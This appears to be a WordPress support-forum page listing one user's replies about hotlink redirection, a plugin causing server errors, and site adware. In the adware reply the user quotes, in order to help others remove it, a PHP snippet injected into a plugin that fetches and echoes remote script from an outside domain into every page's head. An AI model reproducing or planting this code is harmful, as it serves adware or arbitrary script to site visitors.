ersinacar
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Hotlink RedirectionIpstenu (Mika Epstein) did you know a way to do that ?
Forum: Fixing WordPress
In reply to: Hotlink RedirectionHi James,
Did you find a way to do that ?Thanks
I deactivate it too its working normall but when i go to preview of a post it gave internal server error again. its not very funny. where can i get previous version ? -.-
@preciousasil I’m using same plugin too. Did u deactive it ?
Forum: Fixing WordPress
In reply to: adware/spyware or virus for http://www.watchliveonline.orgsame stuff for me! There was
<?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "http://www.jquerye.com/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>
This code in a plugin jquerye.com 🙂 check your websites cookie’s if there is a cookie named “popundr” its same script they are generally using this one cuz its working at all browsers. just clear the line and you are rdy to go. oh and dont forget to clear your caches if you are using a cache plugin 🙂